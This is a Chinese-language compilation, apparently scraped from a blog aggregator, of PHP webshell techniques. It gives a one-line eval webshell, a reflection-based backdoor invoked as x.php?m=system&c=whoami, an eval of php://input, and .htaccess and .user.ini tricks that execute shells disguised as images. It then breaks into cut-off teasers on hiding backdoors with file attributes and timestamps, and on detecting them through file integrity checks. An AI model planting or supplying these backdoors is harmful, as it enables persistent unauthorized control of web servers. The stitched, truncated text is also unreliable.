一句話 and 大馬
phpspy 菜刀一句話<?php @eval($_post['cmd']);?>
反射後門
$func = new reflectionfunction($_get[m]);
echo $func->invokeargs(array($_get[c]));
呼叫如x.php?m=system&c=whoami
後門也可繞過某些檢測禁用system函式的防護系統
php://input是用來接收post資料(這裡有php://input的介紹)
@eval(file_get_contents('php://input'))
post提交 system('whoami');
.htaccess(需webserver支援)
可以設定任意字尾也可以設定utf7編碼格式shell
然後再傳乙個jpg結尾的shell,訪問即可執行了
.user.ini(需fastcgi配合)
動態修改php.ini配置檔案
user.ini
auto_prepend_file:指定在每個php頁面執行前所要執行的**
auto_prepend_file=demo.gif (每個頁面都會載入demo.gif)
使用php://input (不需要上傳額外的檔案)(需要自行開啟allow_url_include=on 預設為off)
缺點:不支援.user.ini修改allow_url_include (在php5時是php_ini_system。 從php5.2.0起可用。)
PHP後門隱藏技巧
如果想讓自己的webshell留的更久一些,除了webshell要免殺,還需要注意一些隱藏技巧,比如隱藏檔案,修改時間屬性,隱藏檔案內容等。1 隱藏檔案 使用attrib s a h r命令就是把原本的資料夾增加了系統檔案屬性 存檔檔案屬性 唯讀檔案屬性和隱藏檔案屬性。attrib s a h r ...
警惕隱藏的後門!Diasp asp
也可以使用微軟提供的解碼工具 screnc.exe 解碼 在內的任何檔案 包括.asp 發現這個後門的 系統是前些年比較流行的cms系統 塵緣雅境 系統 此處,以其刪除掉這個檔案,我覺得應該考慮更換更加安全的cms系統,年久失修的塵緣雅境 及其修改版 存在太多的安全隱患,其中最嚴重的包括上傳漏洞。這...
如何發現隱藏的Webshell後門
那麼多 裡不可能我們一點點去找後門,另外,即使最好的webshell查殺軟體也不可能完全檢測出來所有的後門,這個時候我們可以通過檢測檔案的完整性來尋找 中隱藏的後門。檔案md5校驗diff命令 linux中的命令,可以檢視兩個文字檔案的差異 diff abbcdefhilnnppqrsttuvwy ...